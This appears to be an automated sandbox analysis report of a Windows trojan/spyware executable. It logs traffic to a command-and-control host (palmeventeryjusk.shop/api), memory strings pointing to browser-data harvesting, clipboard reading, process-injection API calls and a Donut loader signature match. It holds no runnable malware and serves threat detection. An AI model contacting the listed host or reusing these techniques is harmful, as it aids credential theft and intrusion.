Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgSaEMC5GMvBs7EGIjBUDjoZOZwbbYOebWZ9rjzg1pIVUtCKWFvTZJyTatG-di6-kWgVSkMk4x6uhc1VAKAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-27-11; NID=513=E5rhLSrnbfjRk46_dmtGnUqwPwi-mNxfINfN4owhq0ItG93yjm74EKSIboI2GbuuZy2nkvdCUEBUYg9CSinzaNpIviyv4g-zdR9EY5_nU28-231-CAbpyAdj6-Jj6y42jgmw20hQDtRudT_bcPFZ3vPv54iVARp7w4xpHjz1GVI
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMvBs7EGIjCXTsQ7Hz4Kgfi-FiRAT51_6pwZM6lLrAZbawdcw8AX8hoRf91oiReOlMqAgZsqCfUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-27-11; NID=513=kQC6D8SRkrtcp-Ak6hN6139KekVx3zhnDsBO5DsiJ9YDbwqMQ-N6a3Hqkivy0PHw9-eJ3x5r-5xCo2gnEOvmH3O-kQW_B1fyt7z_Em-HG3Cqp_wm97L3ppdQcG3KIgiluTIZwHftN_crK6YXUFLhYGNC9lJOV9dEbrQYPTrEHbs
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMvBs7EGIjA2UZwTDI9cbxIwnZske8EIQMZhE-XvCbuuLKQiNeKFWQoRwO1bxpkt2MlsnyAfg3kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-27-11; NID=513=N_zXEKVcGFSmGJnnf9NfxUQYajfRVtbCJ2yy8YIqZG0n-IE-5-6CcuJsdzHS69fS5Lo6qU6l4YiUp_b7kTJjGJdJDpCMMHkYMxbQvY6bAP4YLsOZcW5Y3kKcK6142ycJULOhE9dA5VMjK3BqAAFXra6F2xBdQGomvF0oNwd5oGw
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HaV2Hha+omFEa1E&MD=EgGFr8F4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=HaV2Hha+omFEa1E&MD=EgGFr8F4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: palmeventeryjusk.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: palmeventeryjusk.shop

Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe	String found in binary or memory: http://www.innosetup.com/
Source: file.exe	String found in binary or memory: http://www.remobjects.com/ps
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2024507652.000000000080A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946746627.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024629586.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2025485076.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/
Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024629586.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2025485076.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.00000000007D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/01(P.
Source: file.exe, 00000000.00000002.2025815738.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024507652.000000000080A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/=
Source: file.exe, 00000000.00000002.2025815738.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024507652.000000000080A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/K
Source: file.exe, 00000000.00000003.2024606062.0000000000804000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/api
Source: file.exe, 00000000.00000003.1946746627.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.000000000080F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/api-
Source: file.exe, 00000000.00000002.2025769616.0000000000808000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024606062.0000000000804000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/apiE0
Source: file.exe, 00000000.00000003.1946339615.0000000000807000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/apimiga
Source: file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938933430.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop/g
Source: file.exe, 00000000.00000002.2025282303.0000000000794000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palmeventeryjusk.shop:443/api
Source: file.exe, 00000000.00000003.1937619765.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1937812498.0000000003216000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1937619765.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000003.1937812498.00000000031F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1937812498.0000000003216000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1937619765.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000003.1937812498.00000000031F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.155.93:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49760 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0290DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,

0_2_0290DDE0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0290DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,

0_2_0290DDE0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_023AF57F NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_023AF57F

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_023AF57F	0_2_023AF57F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02360589	0_2_02360589
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_023672CC	0_2_023672CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0236804C	0_2_0236804C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_023651AC	0_2_023651AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0236667C	0_2_0236667C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02377593	0_2_02377593
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02371A9C	0_2_02371A9C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0239CB6C	0_2_0239CB6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02386BBF	0_2_02386BBF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_023888A3	0_2_023888A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02388965	0_2_02388965
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_023839BC	0_2_023839BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_023889DC	0_2_023889DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02397EBC	0_2_02397EBC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0239CEAC	0_2_0239CEAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02365C9C	0_2_02365C9C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02369C8C	0_2_02369C8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02364DAC	0_2_02364DAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02905183	0_2_02905183
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028F5B57	0_2_028F5B57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02901F80	0_2_02901F80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E4C40	0_2_028E4C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E8250	0_2_028E8250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E4260	0_2_028E4260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E3370	0_2_028E3370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E1000	0_2_028E1000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028F0060	0_2_028F0060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0291B130	0_2_0291B130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E6610	0_2_028E6610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E3770	0_2_028E3770
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02916480	0_2_02916480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0291B470	0_2_0291B470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E5890	0_2_028E5890
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02906E67	0_2_02906E67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02906FA0	0_2_02906FA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02906F29	0_2_02906F29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_028E6C20	0_2_028E6C20

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0236AD1C appears 160 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0236A6CC appears 40 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 028E92E0 appears 160 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 028E8C90 appears 45 times

Source: file.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: file.exe, 00000000.00000000.1620183613.0000000000565000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/0@10/5

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02360C99 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,FindCloseChangeNotification,FindCloseChangeNotification,

0_2_02360C99

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1938015701.0000000003221000.00000004.00000800.00020000.00000000.sdmp

